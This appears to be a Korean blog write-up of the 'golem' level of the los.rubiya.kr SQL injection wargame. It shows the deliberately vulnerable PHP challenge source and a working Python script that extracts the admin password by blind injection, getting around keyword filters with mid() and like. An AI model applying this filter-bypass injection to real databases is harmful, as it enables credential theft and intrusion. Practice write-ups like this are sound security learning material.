웹찢남

Golem-writeup 본문

WEB_HACKING/los.rubiya.kr

Golem-writeup

harry595 2019. 12. 27. 21:14

<?php 
  
include "./config.php"
  
login_chk(); 
  
$db dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(
preg_match('/or|and|substr\(|=/i'$_GET[pw])) exit("HeHe"); 
  
$query "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  
highlight_file(__FILE__); 
?>

 

import re
import requests
import time

flag = ''
length= 0
session =dict(PHPSESSID="자신의 PHPSESSID")
for i in range (1,20):
        for j in range(48,128):
                        r=requests.post("https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='||id like 'admin'+%26%26+(mid(pw,"+str(i)+",1) like '"+chr(j)+"')--%20",cookies=session)
                        if 'Hello admin' in r.text:
                                flag=flag+str(chr(j))
                                print("finding pw: "+flag)
                                break
print("pw "+flag)

 

substr,=을 필터링 해놨다 이럴떈 mid+like구문을 사용하면 된다


                

'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글

Bugbear-writeup  (0) 2019.12.27
Darkknight-writeup  (0) 2019.12.27
Skeleton-writeup  (0) 2019.12.27
Vampire-writeup  (0) 2019.12.27
Troll-writeup  (0) 2019.12.27
Comments